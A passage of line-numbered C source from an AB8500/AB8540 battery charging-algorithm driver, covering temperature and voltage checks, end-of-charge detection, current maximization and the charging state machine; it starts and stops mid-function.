728 int vset, int iset)
729 {
730 switch (di->chg_info.charger_type) {
731 case AC_CHG:
732 dev_dbg(di->dev,
733 "AC parameters: Vset %d, Ich %d\n", vset, iset);
734 abx500_chargalg_usb_en(di, false, 0, 0);
735 abx500_chargalg_ac_en(di, true, vset, iset);
736 break;
737
738 case USB_CHG:
739 dev_dbg(di->dev,
740 "USB parameters: Vset %d, Ich %d\n", vset, iset);
741 abx500_chargalg_ac_en(di, false, 0, 0);
742 abx500_chargalg_usb_en(di, true, vset, iset);
743 break;
744
745 default:
746 dev_err(di->dev, "Unknown charger to charge from\n");
747 break;
748 }
749 }
750
751 /**
752 * abx500_chargalg_check_temp() - Check battery temperature ranges
753 * @di: pointer to the abx500_chargalg structure
754 *
755 * The battery temperature is checked against the predefined limits and the
756 * charge state is changed accordingly
757 */
758 static void abx500_chargalg_check_temp(struct abx500_chargalg *di)
759 {
760 if (di->batt_data.temp > (di->bm->temp_low + di->t_hyst_norm) &&
761 di->batt_data.temp < (di->bm->temp_high - di->t_hyst_norm)) {
762 /* Temp OK! */
763 di->events.btemp_underover = false;
764 di->events.btemp_lowhigh = false;
765 di->t_hyst_norm = 0;
766 di->t_hyst_lowhigh = 0;
767 } else {
768 if (((di->batt_data.temp >= di->bm->temp_high) &&
769 (di->batt_data.temp <
770 (di->bm->temp_over - di->t_hyst_lowhigh))) ||
771 ((di->batt_data.temp >
772 (di->bm->temp_under + di->t_hyst_lowhigh)) &&
773 (di->batt_data.temp <= di->bm->temp_low))) {
774 /* TEMP minor!!!!! */
775 di->events.btemp_underover = false;
776 di->events.btemp_lowhigh = true;
777 di->t_hyst_norm = di->bm->temp_hysteresis;
778 di->t_hyst_lowhigh = 0;
779 } else if (di->batt_data.temp <= di->bm->temp_under ||
780 di->batt_data.temp >= di->bm->temp_over) {
781 /* TEMP major!!!!! */
782 di->events.btemp_underover = true;
783 di->events.btemp_lowhigh = false;
784 di->t_hyst_norm = 0;
785 di->t_hyst_lowhigh = di->bm->temp_hysteresis;
786 } else {
787 /* Within hysteresis */
788 dev_dbg(di->dev, "Within hysteresis limit temp: %d "
789 "hyst_lowhigh %d, hyst normal %d\n",
790 di->batt_data.temp, di->t_hyst_lowhigh,
791 di->t_hyst_norm);
792 }
793 }
794 }
795
796 /**
797 * abx500_chargalg_check_charger_voltage() - Check charger voltage
798 * @di: pointer to the abx500_chargalg structure
799 *
800 * Charger voltage is checked against maximum limit
801 */
802 static void abx500_chargalg_check_charger_voltage(struct abx500_chargalg *di)
803 {
804 if (di->chg_info.usb_volt > di->bm->chg_params->usb_volt_max)
805 di->chg_info.usb_chg_ok = false;
806 else
807 di->chg_info.usb_chg_ok = true;
808
809 if (di->chg_info.ac_volt > di->bm->chg_params->ac_volt_max)
810 di->chg_info.ac_chg_ok = false;
811 else
812 di->chg_info.ac_chg_ok = true;
813
814 }
815
816 /**
817 * abx500_chargalg_end_of_charge() - Check if end-of-charge criteria is fulfilled
818 * @di: pointer to the abx500_chargalg structure
819 *
820 * End-of-charge criteria is fulfilled when the battery voltage is above a
821 * certain limit and the battery current is below a certain limit for a
822 * predefined number of consecutive seconds. If true, the battery is full
823 */
824 static void abx500_chargalg_end_of_charge(struct abx500_chargalg *di)
825 {
826 if (di->charge_status == POWER_SUPPLY_STATUS_CHARGING &&
827 di->charge_state == STATE_NORMAL &&
828 !di->maintenance_chg && (di->batt_data.volt >=
829 di->bm->bat_type[di->bm->batt_id].termination_vol ||
830 di->events.usb_cv_active || di->events.ac_cv_active) &&
831 di->batt_data.avg_curr <
832 di->bm->bat_type[di->bm->batt_id].termination_curr &&
833 di->batt_data.avg_curr > 0) {
834 if (++di->eoc_cnt >= EOC_COND_CNT) {
835 di->eoc_cnt = 0;
836 if ((di->chg_info.charger_type & USB_CHG) &&
837 (di->usb_chg->power_path))
838 ab8540_chargalg_usb_pp_en(di, true);
839 di->charge_status = POWER_SUPPLY_STATUS_FULL;
840 di->maintenance_chg = true;
841 dev_dbg(di->dev, "EOC reached!\n");
842 power_supply_changed(di->chargalg_psy);
843 } else {
844 dev_dbg(di->dev,
845 " EOC limit reached for the %d"
846 " time, out of %d before EOC\n",
847 di->eoc_cnt,
848 EOC_COND_CNT);
849 }
850 } else {
851 di->eoc_cnt = 0;
852 }
853 }
854
855 static void init_maxim_chg_curr(struct abx500_chargalg *di)
856 {
857 di->ccm.original_iset =
858 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl;
859 di->ccm.current_iset =
860 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl;
861 di->ccm.test_delta_i = di->bm->maxi->charger_curr_step;
862 di->ccm.max_current = di->bm->maxi->chg_curr;
863 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
864 di->ccm.level = 0;
865 }
866
867 /**
868 * abx500_chargalg_chg_curr_maxim - increases the charger current to
869 * compensate for the system load
870 * @di pointer to the abx500_chargalg structure
871 *
872 * This maximization function is used to raise the charger current to get the
873 * battery current as close to the optimal value as possible. The battery
874 * current during charging is affected by the system load
875 */
876 static enum maxim_ret abx500_chargalg_chg_curr_maxim(struct abx500_chargalg *di)
877 {
878 int delta_i;
879
880 if (!di->bm->maxi->ena_maxi)
881 return MAXIM_RET_NOACTION;
882
883 delta_i = di->ccm.original_iset - di->batt_data.inst_curr;
884
885 if (di->events.vbus_collapsed) {
886 dev_dbg(di->dev, "Charger voltage has collapsed %d\n",
887 di->ccm.wait_cnt);
888 if (di->ccm.wait_cnt == 0) {
889 dev_dbg(di->dev, "lowering current\n");
890 di->ccm.wait_cnt++;
891 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
892 di->ccm.max_current =
893 di->ccm.current_iset - di->ccm.test_delta_i;
894 di->ccm.current_iset = di->ccm.max_current;
895 di->ccm.level--;
896 return MAXIM_RET_CHANGE;
897 } else {
898 dev_dbg(di->dev, "waiting\n");
899 /* Let's go in here twice before lowering curr again */
900 di->ccm.wait_cnt = (di->ccm.wait_cnt + 1) % 3;
901 return MAXIM_RET_NOACTION;
902 }
903 }
904
905 di->ccm.wait_cnt = 0;
906
907 if ((di->batt_data.inst_curr > di->ccm.original_iset)) {
908 dev_dbg(di->dev, " Maximization Ibat (%dmA) too high"
909 " (limit %dmA) (current iset: %dmA)!\n",
910 di->batt_data.inst_curr, di->ccm.original_iset,
911 di->ccm.current_iset);
912
913 if (di->ccm.current_iset == di->ccm.original_iset)
914 return MAXIM_RET_NOACTION;
915
916 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
917 di->ccm.current_iset = di->ccm.original_iset;
918 di->ccm.level = 0;
919
920 return MAXIM_RET_IBAT_TOO_HIGH;
921 }
922
923 if (delta_i > di->ccm.test_delta_i &&
924 (di->ccm.current_iset + di->ccm.test_delta_i) <
925 di->ccm.max_current) {
926 if (di->ccm.condition_cnt-- == 0) {
927 /* Increse the iset with cco.test_delta_i */
928 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
929 di->ccm.current_iset += di->ccm.test_delta_i;
930 di->ccm.level++;
931 dev_dbg(di->dev, " Maximization needed, increase"
932 " with %d mA to %dmA (Optimal ibat: %d)"
933 " Level %d\n",
934 di->ccm.test_delta_i,
935 di->ccm.current_iset,
936 di->ccm.original_iset,
937 di->ccm.level);
938 return MAXIM_RET_CHANGE;
939 } else {
940 return MAXIM_RET_NOACTION;
941 }
942 } else {
943 di->ccm.condition_cnt = di->bm->maxi->wait_cycles;
944 return MAXIM_RET_NOACTION;
945 }
946 }
947
948 static void handle_maxim_chg_curr(struct abx500_chargalg *di)
949 {
950 enum maxim_ret ret;
951 int result;
952
953 ret = abx500_chargalg_chg_curr_maxim(di);
954 switch (ret) {
955 case MAXIM_RET_CHANGE:
956 result = abx500_chargalg_update_chg_curr(di,
957 di->ccm.current_iset);
958 if (result)
959 dev_err(di->dev, "failed to set chg curr\n");
960 break;
961 case MAXIM_RET_IBAT_TOO_HIGH:
962 result = abx500_chargalg_update_chg_curr(di,
963 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl);
964 if (result)
965 dev_err(di->dev, "failed to set chg curr\n");
966 break;
967
968 case MAXIM_RET_NOACTION:
969 default:
970 /* Do nothing..*/
971 break;
972 }
973 }
974
975 static int abx500_chargalg_get_ext_psy_data(struct device *dev, void *data)
976 {
977 struct power_supply *psy;
978 struct power_supply *ext = dev_get_drvdata(dev);
979 const char **supplicants = (const char **)ext->supplied_to;
980 struct abx500_chargalg *di;
981 union power_supply_propval ret;
982 int j;
983 bool capacity_updated = false;
984
985 psy = (struct power_supply *)data;
986 di = power_supply_get_drvdata(psy);
987 /* For all psy where the driver name appears in any supplied_to */
988 j = match_string(supplicants, ext->num_supplicants, psy->desc->name);
989 if (j < 0)
990 return 0;
991
992 /*
993 * If external is not registering 'POWER_SUPPLY_PROP_CAPACITY' to its
994 * property because of handling that sysfs entry on its own, this is
995 * the place to get the battery capacity.
996 */
997 if (!power_supply_get_property(ext, POWER_SUPPLY_PROP_CAPACITY, &ret)) {
998 di->batt_data.percent = ret.intval;
999 capacity_updated = true;
1000 }
1001
1002 /* Go through all properties for the psy */
1003 for (j = 0; j < ext->desc->num_properties; j++) {
1004 enum power_supply_property prop;
1005 prop = ext->desc->properties[j];
1006
1007 /*
1008 * Initialize chargers if not already done.
1009 * The ab8500_charger*/
1010 if (!di->ac_chg &&
1011 ext->desc->type == POWER_SUPPLY_TYPE_MAINS)
1012 di->ac_chg = psy_to_ux500_charger(ext);
1013 else if (!di->usb_chg &&
1014 ext->desc->type == POWER_SUPPLY_TYPE_USB)
1015 di->usb_chg = psy_to_ux500_charger(ext);
1016
1017 if (power_supply_get_property(ext, prop, &ret))
1018 continue;
1019 switch (prop) {
1020 case POWER_SUPPLY_PROP_PRESENT:
1021 switch (ext->desc->type) {
1022 case POWER_SUPPLY_TYPE_BATTERY:
1023 /* Battery present */
1024 if (ret.intval)
1025 di->events.batt_rem = false;
1026 /* Battery removed */
1027 else
1028 di->events.batt_rem = true;
1029 break;
1030 case POWER_SUPPLY_TYPE_MAINS:
1031 /* AC disconnected */
1032 if (!ret.intval &&
1033 (di->chg_info.conn_chg & AC_CHG)) {
1034 di->chg_info.prev_conn_chg =
1035 di->chg_info.conn_chg;
1036 di->chg_info.conn_chg &= ~AC_CHG;
1037 }
1038 /* AC connected */
1039 else if (ret.intval &&
1040 !(di->chg_info.conn_chg & AC_CHG)) {
1041 di->chg_info.prev_conn_chg =
1042 di->chg_info.conn_chg;
1043 di->chg_info.conn_chg |= AC_CHG;
1044 }
1045 break;
1046 case POWER_SUPPLY_TYPE_USB:
1047 /* USB disconnected */
1048 if (!ret.intval &&
1049 (di->chg_info.conn_chg & USB_CHG)) {
1050 di->chg_info.prev_conn_chg =
1051 di->chg_info.conn_chg;
1052 di->chg_info.conn_chg &= ~USB_CHG;
1053 }
1054 /* USB connected */
1055 else if (ret.intval &&
1056 !(di->chg_info.conn_chg & USB_CHG)) {
1057 di->chg_info.prev_conn_chg =
1058 di->chg_info.conn_chg;
1059 di->chg_info.conn_chg |= USB_CHG;
1060 }
1061 break;
1062 default:
1063 break;
1064 }
1065 break;
1066
1067 case POWER_SUPPLY_PROP_ONLINE:
1068 switch (ext->desc->type) {
1069 case POWER_SUPPLY_TYPE_BATTERY:
1070 break;
1071 case POWER_SUPPLY_TYPE_MAINS:
1072 /* AC offline */
1073 if (!ret.intval &&
1074 (di->chg_info.online_chg & AC_CHG)) {
1075 di->chg_info.prev_online_chg =
1076 di->chg_info.online_chg;
1077 di->chg_info.online_chg &= ~AC_CHG;
1078 }
1079 /* AC online */
1080 else if (ret.intval &&
1081 !(di->chg_info.online_chg & AC_CHG)) {
1082 di->chg_info.prev_online_chg =
1083 di->chg_info.online_chg;
1084 di->chg_info.online_chg |= AC_CHG;
1085 queue_delayed_work(di->chargalg_wq,
1086 &di->chargalg_wd_work, 0);
1087 }
1088 break;
1089 case POWER_SUPPLY_TYPE_USB:
1090 /* USB offline */
1091 if (!ret.intval &&
1092 (di->chg_info.online_chg & USB_CHG)) {
1093 di->chg_info.prev_online_chg =
1094 di->chg_info.online_chg;
1095 di->chg_info.online_chg &= ~USB_CHG;
1096 }
1097 /* USB online */
1098 else if (ret.intval &&
1099 !(di->chg_info.online_chg & USB_CHG)) {
1100 di->chg_info.prev_online_chg =
1101 di->chg_info.online_chg;
1102 di->chg_info.online_chg |= USB_CHG;
1103 queue_delayed_work(di->chargalg_wq,
1104 &di->chargalg_wd_work, 0);
1105 }
1106 break;
1107 default:
1108 break;
1109 }
1110 break;
1111
1112 case POWER_SUPPLY_PROP_HEALTH:
1113 switch (ext->desc->type) {
1114 case POWER_SUPPLY_TYPE_BATTERY:
1115 break;
1116 case POWER_SUPPLY_TYPE_MAINS:
1117 switch (ret.intval) {
1118 case POWER_SUPPLY_HEALTH_UNSPEC_FAILURE:
1119 di->events.mainextchnotok = true;
1120 di->events.main_thermal_prot = false;
1121 di->events.main_ovv = false;
1122 di->events.ac_wd_expired = false;
1123 break;
1124 case POWER_SUPPLY_HEALTH_DEAD:
1125 di->events.ac_wd_expired = true;
1126 di->events.mainextchnotok = false;
1127 di->events.main_ovv = false;
1128 di->events.main_thermal_prot = false;
1129 break;
1130 case POWER_SUPPLY_HEALTH_COLD:
1131 case POWER_SUPPLY_HEALTH_OVERHEAT:
1132 di->events.main_thermal_prot = true;
1133 di->events.mainextchnotok = false;
1134 di->events.main_ovv = false;
1135 di->events.ac_wd_expired = false;
1136 break;
1137 case POWER_SUPPLY_HEALTH_OVERVOLTAGE:
1138 di->events.main_ovv = true;
1139 di->events.mainextchnotok = false;
1140 di->events.main_thermal_prot = false;
1141 di->events.ac_wd_expired = false;
1142 break;
1143 case POWER_SUPPLY_HEALTH_GOOD:
1144 di->events.main_thermal_prot = false;
1145 di->events.mainextchnotok = false;
1146 di->events.main_ovv = false;
1147 di->events.ac_wd_expired = false;
1148 break;
1149 default:
1150 break;
1151 }
1152 break;
1153
1154 case POWER_SUPPLY_TYPE_USB:
1155 switch (ret.intval) {
1156 case POWER_SUPPLY_HEALTH_UNSPEC_FAILURE:
1157 di->events.usbchargernotok = true;
1158 di->events.usb_thermal_prot = false;
1159 di->events.vbus_ovv = false;
1160 di->events.usb_wd_expired = false;
1161 break;
1162 case POWER_SUPPLY_HEALTH_DEAD:
1163 di->events.usb_wd_expired = true;
1164 di->events.usbchargernotok = false;
1165 di->events.usb_thermal_prot = false;
1166 di->events.vbus_ovv = false;
1167 break;
1168 case POWER_SUPPLY_HEALTH_COLD:
1169 case POWER_SUPPLY_HEALTH_OVERHEAT:
1170 di->events.usb_thermal_prot = true;
1171 di->events.usbchargernotok = false;
1172 di->events.vbus_ovv = false;
1173 di->events.usb_wd_expired = false;
1174 break;
1175 case POWER_SUPPLY_HEALTH_OVERVOLTAGE:
1176 di->events.vbus_ovv = true;
1177 di->events.usbchargernotok = false;
1178 di->events.usb_thermal_prot = false;
1179 di->events.usb_wd_expired = false;
1180 break;
1181 case POWER_SUPPLY_HEALTH_GOOD:
1182 di->events.usbchargernotok = false;
1183 di->events.usb_thermal_prot = false;
1184 di->events.vbus_ovv = false;
1185 di->events.usb_wd_expired = false;
1186 break;
1187 default:
1188 break;
1189 }
1190 default:
1191 break;
1192 }
1193 break;
1194
1195 case POWER_SUPPLY_PROP_VOLTAGE_NOW:
1196 switch (ext->desc->type) {
1197 case POWER_SUPPLY_TYPE_BATTERY:
1198 di->batt_data.volt = ret.intval / 1000;
1199 break;
1200 case POWER_SUPPLY_TYPE_MAINS:
1201 di->chg_info.ac_volt = ret.intval / 1000;
1202 break;
1203 case POWER_SUPPLY_TYPE_USB:
1204 di->chg_info.usb_volt = ret.intval / 1000;
1205 break;
1206 default:
1207 break;
1208 }
1209 break;
1210
1211 case POWER_SUPPLY_PROP_VOLTAGE_AVG:
1212 switch (ext->desc->type) {
1213 case POWER_SUPPLY_TYPE_MAINS:
1214 /* AVG is used to indicate when we are
1215 * in CV mode */
1216 if (ret.intval)
1217 di->events.ac_cv_active = true;
1218 else
1219 di->events.ac_cv_active = false;
1220
1221 break;
1222 case POWER_SUPPLY_TYPE_USB:
1223 /* AVG is used to indicate when we are
1224 * in CV mode */
1225 if (ret.intval)
1226 di->events.usb_cv_active = true;
1227 else
1228 di->events.usb_cv_active = false;
1229
1230 break;
1231 default:
1232 break;
1233 }
1234 break;
1235
1236 case POWER_SUPPLY_PROP_TECHNOLOGY:
1237 switch (ext->desc->type) {
1238 case POWER_SUPPLY_TYPE_BATTERY:
1239 if (ret.intval)
1240 di->events.batt_unknown = false;
1241 else
1242 di->events.batt_unknown = true;
1243
1244 break;
1245 default:
1246 break;
1247 }
1248 break;
1249
1250 case POWER_SUPPLY_PROP_TEMP:
1251 di->batt_data.temp = ret.intval / 10;
1252 break;
1253
1254 case POWER_SUPPLY_PROP_CURRENT_NOW:
1255 switch (ext->desc->type) {
1256 case POWER_SUPPLY_TYPE_MAINS:
1257 di->chg_info.ac_curr =
1258 ret.intval / 1000;
1259 break;
1260 case POWER_SUPPLY_TYPE_USB:
1261 di->chg_info.usb_curr =
1262 ret.intval / 1000;
1263 break;
1264 case POWER_SUPPLY_TYPE_BATTERY:
1265 di->batt_data.inst_curr = ret.intval / 1000;
1266 break;
1267 default:
1268 break;
1269 }
1270 break;
1271
1272 case POWER_SUPPLY_PROP_CURRENT_AVG:
1273 switch (ext->desc->type) {
1274 case POWER_SUPPLY_TYPE_BATTERY:
1275 di->batt_data.avg_curr = ret.intval / 1000;
1276 break;
1277 case POWER_SUPPLY_TYPE_USB:
1278 if (ret.intval)
1279 di->events.vbus_collapsed = true;
1280 else
1281 di->events.vbus_collapsed = false;
1282 break;
1283 default:
1284 break;
1285 }
1286 break;
1287 case POWER_SUPPLY_PROP_CAPACITY:
1288 if (!capacity_updated)
1289 di->batt_data.percent = ret.intval;
1290 break;
1291 default:
1292 break;
1293 }
1294 }
1295 return 0;
1296 }
1297
1298 /**
1299 * abx500_chargalg_external_power_changed() - callback for power supply changes
1300 * @psy: pointer to the structure power_supply
1301 *
1302 * This function is the entry point of the pointer external_power_changed
1303 * of the structure power_supply.
1304 * This function gets executed when there is a change in any external power
1305 * supply that this driver needs to be notified of.
1306 */
1307 static void abx500_chargalg_external_power_changed(struct power_supply *psy)
1308 {
1309 struct abx500_chargalg *di = power_supply_get_drvdata(psy);
1310
1311 /*
1312 * Trigger execution of the algorithm instantly and read
1313 * all power_supply properties there instead
1314 */
1315 queue_work(di->chargalg_wq, &di->chargalg_work);
1316 }
1317
1318 /**
1319 * abx500_chargalg_algorithm() - Main function for the algorithm
1320 * @di: pointer to the abx500_chargalg structure
1321 *
1322 * This is the main control function for the charging algorithm.
1323 * It is called periodically or when something happens that will
1324 * trigger a state change
1325 */
1326 static void abx500_chargalg_algorithm(struct abx500_chargalg *di)
1327 {
1328 int charger_status;
1329 int ret;
1330 int curr_step_lvl;
1331
1332 /* Collect data from all power_supply class devices */
1333 class_for_each_device(power_supply_class, NULL,
1334 di->chargalg_psy, abx500_chargalg_get_ext_psy_data);
1335
1336 abx500_chargalg_end_of_charge(di);
1337 abx500_chargalg_check_temp(di);
1338 abx500_chargalg_check_charger_voltage(di);
1339
1340 charger_status = abx500_chargalg_check_charger_connection(di);
1341 abx500_chargalg_check_current_step_status(di);
1342
1343 if (is_ab8500(di->parent)) {
1344 ret = abx500_chargalg_check_charger_enable(di);
1345 if (ret < 0)
1346 dev_err(di->dev, "Checking charger is enabled error"
1347 ": Returned Value %d\n", ret);
1348 }
1349
1350 /*
1351 * First check if we have a charger connected.
1352 * Also we don't allow charging of unknown batteries if configured
1353 * this way
1354 */
1355 if (!charger_status ||
1356 (di->events.batt_unknown && !di->bm->chg_unknown_bat)) {
1357 if (di->charge_state != STATE_HANDHELD) {
1358 di->events.safety_timer_expired = false;
1359 abx500_chargalg_state_to(di, STATE_HANDHELD_INIT);
1360 }
1361 }
1362
1363 /* If suspended, we should not continue checking the flags */
1364 else if (di->charge_state == STATE_SUSPENDED_INIT ||
1365 di->charge_state == STATE_SUSPENDED) {
1366 /* We don't do anything here, just don,t continue */
1367 }
1368
1369 /* Safety timer expiration */
1370 else if (di->events.safety_timer_expired) {
1371 if (di->charge_state != STATE_SAFETY_TIMER_EXPIRED)
1372 abx500_chargalg_state_to(di,
1373 STATE_SAFETY_TIMER_EXPIRED_INIT);
1374 }
1375 /*
1376 * Check if any interrupts has occured
1377 * that will prevent us from charging
1378 */
1379
1380 /* Battery removed */
1381 else if (di->events.batt_rem) {
1382 if (di->charge_state != STATE_BATT_REMOVED)
1383 abx500_chargalg_state_to(di, STATE_BATT_REMOVED_INIT);
1384 }
1385 /* Main or USB charger not ok. */
1386 else if (di->events.mainextchnotok || di->events.usbchargernotok) {
1387 /*
1388 * If vbus_collapsed is set, we have to lower the charger
1389 * current, which is done in the normal state below
1390 */
1391 if (di->charge_state != STATE_CHG_NOT_OK &&
1392 !di->events.vbus_collapsed)
1393 abx500_chargalg_state_to(di, STATE_CHG_NOT_OK_INIT);
1394 }
1395 /* VBUS, Main or VBAT OVV. */
1396 else if (di->events.vbus_ovv ||
1397 di->events.main_ovv ||
1398 di->events.batt_ovv ||
1399 !di->chg_info.usb_chg_ok ||
1400 !di->chg_info.ac_chg_ok) {
1401 if (di->charge_state != STATE_OVV_PROTECT)
1402 abx500_chargalg_state_to(di, STATE_OVV_PROTECT_INIT);
1403 }
1404 /* USB Thermal, stop charging */
1405 else if (di->events.main_thermal_prot ||
1406 di->events.usb_thermal_prot) {
1407 if (di->charge_state != STATE_HW_TEMP_PROTECT)
1408 abx500_chargalg_state_to(di,
1409 STATE_HW_TEMP_PROTECT_INIT);
1410 }
1411 /* Battery temp over/under */
1412 else if (di->events.btemp_underover) {
1413 if (di->charge_state != STATE_TEMP_UNDEROVER)
1414 abx500_chargalg_state_to(di,
1415 STATE_TEMP_UNDEROVER_INIT);
1416 }
1417 /* Watchdog expired */
1418 else if (di->events.ac_wd_expired ||
1419 di->events.usb_wd_expired) {
1420 if (di->charge_state != STATE_WD_EXPIRED)
1421 abx500_chargalg_state_to(di, STATE_WD_EXPIRED_INIT);
1422 }
1423 /* Battery temp high/low */
1424 else if (di->events.btemp_lowhigh) {
1425 if (di->charge_state != STATE_TEMP_LOWHIGH)
1426 abx500_chargalg_state_to(di, STATE_TEMP_LOWHIGH_INIT);
1427 }
1428
1429 dev_dbg(di->dev,
1430 "[CHARGALG] Vb %d Ib_avg %d Ib_inst %d Tb %d Cap %d Maint %d "
1431 "State %s Active_chg %d Chg_status %d AC %d USB %d "
1432 "AC_online %d USB_online %d AC_CV %d USB_CV %d AC_I %d "
1433 "USB_I %d AC_Vset %d AC_Iset %d USB_Vset %d USB_Iset %d\n",
1434 di->batt_data.volt,
1435 di->batt_data.avg_curr,
1436 di->batt_data.inst_curr,
1437 di->batt_data.temp,
1438 di->batt_data.percent,
1439 di->maintenance_chg,
1440 states[di->charge_state],
1441 di->chg_info.charger_type,
1442 di->charge_status,
1443 di->chg_info.conn_chg & AC_CHG,
1444 di->chg_info.conn_chg & USB_CHG,
1445 di->chg_info.online_chg & AC_CHG,
1446 di->chg_info.online_chg & USB_CHG,
1447 di->events.ac_cv_active,
1448 di->events.usb_cv_active,
1449 di->chg_info.ac_curr,
1450 di->chg_info.usb_curr,
1451 di->chg_info.ac_vset,
1452 di->chg_info.ac_iset,
1453 di->chg_info.usb_vset,
1454 di->chg_info.usb_iset);
1455
1456 switch (di->charge_state) {
1457 case STATE_HANDHELD_INIT:
1458 abx500_chargalg_stop_charging(di);
1459 di->charge_status = POWER_SUPPLY_STATUS_DISCHARGING;
1460 abx500_chargalg_state_to(di, STATE_HANDHELD);
1461 /* Intentional fallthrough */
1462
1463 case STATE_HANDHELD:
1464 break;
1465
1466 case STATE_SUSPENDED_INIT:
1467 if (di->susp_status.ac_suspended)
1468 abx500_chargalg_ac_en(di, false, 0, 0);
1469 if (di->susp_status.usb_suspended)
1470 abx500_chargalg_usb_en(di, false, 0, 0);
1471 abx500_chargalg_stop_safety_timer(di);
1472 abx500_chargalg_stop_maintenance_timer(di);
1473 di->charge_status = POWER_SUPPLY_STATUS_NOT_CHARGING;
1474 di->maintenance_chg = false;
1475 abx500_chargalg_state_to(di, STATE_SUSPENDED);
1476 power_supply_changed(di->chargalg_psy);
1477 /* Intentional fallthrough */
1478
1479 case STATE_SUSPENDED:
1480 /* CHARGING is suspended */
1481 break;
1482
1483 case STATE_BATT_REMOVED_INIT:
1484 abx500_chargalg_stop_charging(di);
1485 abx500_chargalg_state_to(di, STATE_BATT_REMOVED);
1486 /* Intentional fallthrough */
1487
1488 case STATE_BATT_REMOVED:
1489 if (!di->events.batt_rem)
1490 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1491 break;
1492
1493 case STATE_HW_TEMP_PROTECT_INIT:
1494 abx500_chargalg_stop_charging(di);
1495 abx500_chargalg_state_to(di, STATE_HW_TEMP_PROTECT);
1496 /* Intentional fallthrough */
1497
1498 case STATE_HW_TEMP_PROTECT:
1499 if (!di->events.main_thermal_prot &&
1500 !di->events.usb_thermal_prot)
1501 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1502 break;
1503
1504 case STATE_OVV_PROTECT_INIT:
1505 abx500_chargalg_stop_charging(di);
1506 abx500_chargalg_state_to(di, STATE_OVV_PROTECT);
1507 /* Intentional fallthrough */
1508
1509 case STATE_OVV_PROTECT:
1510 if (!di->events.vbus_ovv &&
1511 !di->events.main_ovv &&
1512 !di->events.batt_ovv &&
1513 di->chg_info.usb_chg_ok &&
1514 di->chg_info.ac_chg_ok)
1515 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1516 break;
1517
1518 case STATE_CHG_NOT_OK_INIT:
1519 abx500_chargalg_stop_charging(di);
1520 abx500_chargalg_state_to(di, STATE_CHG_NOT_OK);
1521 /* Intentional fallthrough */
1522
1523 case STATE_CHG_NOT_OK:
1524 if (!di->events.mainextchnotok &&
1525 !di->events.usbchargernotok)
1526 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1527 break;
1528
1529 case STATE_SAFETY_TIMER_EXPIRED_INIT:
1530 abx500_chargalg_stop_charging(di);
1531 abx500_chargalg_state_to(di, STATE_SAFETY_TIMER_EXPIRED);
1532 /* Intentional fallthrough */
1533
1534 case STATE_SAFETY_TIMER_EXPIRED:
1535 /* We exit this state when charger is removed */
1536 break;
1537
1538 case STATE_NORMAL_INIT:
1539 if ((di->chg_info.charger_type & USB_CHG) &&
1540 di->usb_chg->power_path) {
1541 if (di->batt_data.volt >
1542 (di->bm->fg_params->lowbat_threshold +
1543 BAT_PLUS_MARGIN)) {
1544 ab8540_chargalg_usb_pre_chg_en(di, false);
1545 ab8540_chargalg_usb_pp_en(di, false);
1546 } else {
1547 ab8540_chargalg_usb_pp_en(di, true);
1548 ab8540_chargalg_usb_pre_chg_en(di, true);
1549 abx500_chargalg_state_to(di,
1550 STATE_USB_PP_PRE_CHARGE);
1551 break;
1552 }
1553 }
1554
1555 if (di->curr_status.curr_step == CHARGALG_CURR_STEP_LOW)
1556 abx500_chargalg_stop_charging(di);
1557 else {
1558 curr_step_lvl = di->bm->bat_type[
1559 di->bm->batt_id].normal_cur_lvl
1560 * di->curr_status.curr_step
1561 / CHARGALG_CURR_STEP_HIGH;
1562 abx500_chargalg_start_charging(di,
1563 di->bm->bat_type[di->bm->batt_id]
1564 .normal_vol_lvl, curr_step_lvl);
1565 }
1566
1567 abx500_chargalg_state_to(di, STATE_NORMAL);
1568 abx500_chargalg_start_safety_timer(di);
1569 abx500_chargalg_stop_maintenance_timer(di);
1570 init_maxim_chg_curr(di);
1571 di->charge_status = POWER_SUPPLY_STATUS_CHARGING;
1572 di->eoc_cnt = 0;
1573 di->maintenance_chg = false;
1574 power_supply_changed(di->chargalg_psy);
1575
1576 break;
1577
1578 case STATE_USB_PP_PRE_CHARGE:
1579 if (di->batt_data.volt >
1580 (di->bm->fg_params->lowbat_threshold +
1581 BAT_PLUS_MARGIN))
1582 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1583 break;
1584
1585 case STATE_NORMAL:
1586 handle_maxim_chg_curr(di);
1587 if (di->charge_status == POWER_SUPPLY_STATUS_FULL &&
1588 di->maintenance_chg) {
1589 if (di->bm->no_maintenance)
1590 abx500_chargalg_state_to(di,
1591 STATE_WAIT_FOR_RECHARGE_INIT);
1592 else
1593 abx500_chargalg_state_to(di,
1594 STATE_MAINTENANCE_A_INIT);
1595 }
1596 break;
1597
1598 /* This state will be used when the maintenance state is disabled */
1599 case STATE_WAIT_FOR_RECHARGE_INIT:
1600 abx500_chargalg_hold_charging(di);
1601 abx500_chargalg_state_to(di, STATE_WAIT_FOR_RECHARGE);
1602 /* Intentional fallthrough */
1603
1604 case STATE_WAIT_FOR_RECHARGE:
1605 if (di->batt_data.percent <=
1606 di->bm->bat_type[di->bm->batt_id].
1607 recharge_cap)
1608 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1609 break;
1610
1611 case STATE_MAINTENANCE_A_INIT:
1612 abx500_chargalg_stop_safety_timer(di);
1613 abx500_chargalg_start_maintenance_timer(di,
1614 di->bm->bat_type[
1615 di->bm->batt_id].maint_a_chg_timer_h);
1616 abx500_chargalg_start_charging(di,
1617 di->bm->bat_type[
1618 di->bm->batt_id].maint_a_vol_lvl,
1619 di->bm->bat_type[
1620 di->bm->batt_id].maint_a_cur_lvl);
1621 abx500_chargalg_state_to(di, STATE_MAINTENANCE_A);
1622 power_supply_changed(di->chargalg_psy);
1623 /* Intentional fallthrough*/
1624
1625 case STATE_MAINTENANCE_A:
1626 if (di->events.maintenance_timer_expired) {
1627 abx500_chargalg_stop_maintenance_timer(di);
